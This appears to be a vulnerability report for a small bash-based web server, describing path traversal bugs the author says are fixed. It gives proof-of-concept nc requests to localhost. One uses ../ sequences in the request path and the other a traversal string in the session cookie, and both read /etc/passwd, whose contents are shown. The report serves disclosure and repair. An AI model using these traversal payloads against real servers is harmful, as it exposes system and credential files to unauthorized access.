Fix for a security vulnerability "Path Traversal" (CWE-35)

[ymzkei5]

I have found a security vulnerability related to path traversal (CWE-35) and have fixed it.

REQUEST_PATH part

bash-5.2# nc 127.0.0.1 8080 GET /../../../../../../etc/passwd HTTP/1.0

HTTP/1.0 200 OK Content-Length: 1172

root:x:0:0:root:/root:/bin/ash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin ...

SESSION_ID part

bash-5.2# nc 127.0.0.1 8080 GET / HTTP/1.0 Cookie: BASHSESSID=../../../../../etc/passwd

: (main) - Listening on 127.0.0.1 port 8080 :: (cookieSet <- runner <- buildResponse <- parseAndPrint <- main) - trii=lek; Max-Age=5000 /tmp/../../../../../etc/passwd: line 1: root:x:0:0:root:/root:/bin/ash: No such file or directory /tmp/../../../../../etc/passwd: line 2: bin:x:1:1:bin:/bin:/sbin/nologin: No such file or directory /tmp/../../../../../etc/passwd: line 3: daemon:x:2:2:daemon:/sbin:/sbin/nologin: No such file or directory ...